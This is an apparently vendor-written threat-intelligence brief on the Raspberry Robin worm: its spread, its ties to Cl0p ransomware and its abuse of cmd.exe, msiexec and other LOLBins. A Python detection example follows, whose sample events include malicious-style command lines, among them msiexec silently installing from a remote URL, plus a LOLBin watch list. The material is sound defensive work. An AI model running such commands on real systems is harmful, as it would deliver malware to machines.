2022-11-01

The Rapid Growth of Raspberry Robin Malware


Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: Microsoft

While exploring the web of activity associated with the Raspberry Robin worm, researchers on Microsoft's Security Threat Intelligence team found that a group tracked as DEV-0243 has used the worm to deploy Cl0p ransomware. Activity associated with Raspberry Robin has risen sharply; according to Microsoft's telemetry, "3,000 devices in almost 1,000 organizations have seen at least one Raspberry Robin payload-related alert in the last 30 days." Use of the malware has developed significantly since Red Canary first reported it, when no post-exploitation activity had yet been observed. Now that it has become a popular malware distribution channel, it is used in a variety of campaigns and is deployed in tandem with popular malware loaders such as BumbleBee, IcedID, and Truebot. The malware's initial access vectors include infected USB drives, malicious ads often posing as fake updates, and phishing. Techniques commonly seen with Raspberry Robin include LNK shortcut files that trigger commands through cmd.exe, abuse of msiexec to download and install malicious packages, and the use of several other living-off-the-land binaries (LOLBins). In the cybercrime ecosystem, Raspberry Robin serves both initial access brokers, who harvest credentials for sale, and threat actors who use it to run complete ransomware operations.
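The msiexec and cmd.exe tradecraft described above maps directly onto process-creation telemetry. The following Python is an added example written for this summary, not detection content from Anvilogic, Microsoft, or Red Canary. It runs three simple rules over a few constructed process-creation events; the event field names are an assumption loosely modelled on Sysmon Event ID 1, the hostnames and paths are made up, and the LOLBin list is an illustrative set chosen here rather than one taken from the report. The rules flag msiexec.exe installing a package from a URL rather than a local path, cmd.exe as the direct parent of a LOLBin, and explorer.exe launching cmd.exe with a /R, /C or /K command that references a non-system drive letter, which is the heuristic used here for shortcut lures on removable media.

```python
"""Added detection example: three process-creation rules for Raspberry Robin-style
msiexec and cmd.exe tradecraft, run over constructed sample events."""
import re

# Constructed sample process-creation events (not real telemetry). The field
# names are an assumption, loosely modelled on Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {   # benign: quiet install of a package from a local file share
        "host": "WS01",
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\msiexec.exe",
        "cmdline": r"msiexec.exe /i \\fileserver\software\OfficeSetup.msi /qn",
    },
    {   # shortcut-style lure: Explorer launches cmd.exe reading a file on a removable drive
        "host": "WS02",
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"cmd.exe /R type e:\recycler.bin\install.cmd | cmd",
    },
    {   # msiexec fetches and quietly installs a package from a URL (hostname is made up)
        "host": "WS02",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\msiexec.exe",
        "cmdline": r'msiexec /Q /I "http://loader.invalid:8080/ws02?x=1"',
    },
    {   # benign: cmd.exe running ping
        "host": "WS03",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\PING.EXE",
        "cmdline": r"ping -n 1 10.0.0.1",
    },
]

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
# msiexec install switches: /i, -i, /package (case-insensitive)
INSTALL_SWITCH_RE = re.compile(r"(?:^|\s)[/-](?:i|package)\b", re.IGNORECASE)
# cmd.exe "run this command" switches: /R, /C, /K
CMD_RUN_SWITCH_RE = re.compile(r"(?:^|\s)/[rck]\b", re.IGNORECASE)
# any drive letter other than A-C, used here as a rough stand-in for removable media (assumption)
NON_SYSTEM_DRIVE_RE = re.compile(r"(?<!\w)[d-z]:\\", re.IGNORECASE)

# Illustrative LOLBin set chosen for this example, not a list taken from the report.
LOLBINS = {"msiexec.exe", "rundll32.exe", "regsvr32.exe",
           "odbcconf.exe", "mshta.exe", "certutil.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def msiexec_remote_install(ev: dict) -> bool:
    """msiexec.exe installing a package whose source is a URL, not a local path."""
    cmd = ev["cmdline"]
    return (basename(ev["image"]) == "msiexec.exe"
            and bool(INSTALL_SWITCH_RE.search(cmd))
            and bool(URL_RE.search(cmd)))


def cmd_spawns_lolbin(ev: dict) -> bool:
    """cmd.exe as the direct parent of a living-off-the-land binary."""
    return (basename(ev["parent_image"]) == "cmd.exe"
            and basename(ev["image"]) in LOLBINS)


def explorer_cmd_removable_drive(ev: dict) -> bool:
    """Explorer (e.g. a double-clicked shortcut) launching cmd.exe with a /R, /C or /K
    command that references a non-system drive letter."""
    cmd = ev["cmdline"]
    return (basename(ev["parent_image"]) == "explorer.exe"
            and basename(ev["image"]) == "cmd.exe"
            and bool(CMD_RUN_SWITCH_RE.search(cmd))
            and bool(NON_SYSTEM_DRIVE_RE.search(cmd)))


RULES = [msiexec_remote_install, cmd_spawns_lolbin, explorer_cmd_removable_drive]


def run_detections(events) -> list:
    """Return (rule_name, host, cmdline) for every rule that fires on every event."""
    hits = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                hits.append((rule.__name__, ev["host"], ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for name, host, cmd in run_detections(SAMPLE_EVENTS):
        print(f"{host}: {name}: {cmd}")
```

On the sample events only WS02 fires: the explorer-to-cmd.exe rule on the removable-drive command, and both the msiexec and the cmd.exe-to-LOLBin rules on the quiet URL install. In production, the msiexec rule needs an allow-list for legitimate web-hosted installers, and the drive-letter heuristic should be replaced with the removable-media flag your EDR or Sysmon configuration actually exposes; correlating the three rules on the same host within a short window, as the "Raspberry Robin Abuses MsiExec" scenario below suggests, is what turns individually noisy signals into a usable alert.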

Anvilogic Scenario:

  • Raspberry Robin Abuses MsiExec

Anvilogic Use Cases:

  • Symbolic OR Hard File Link Created
  • Suspicious Executable by CMD.exe
  • Msiexec Abuse
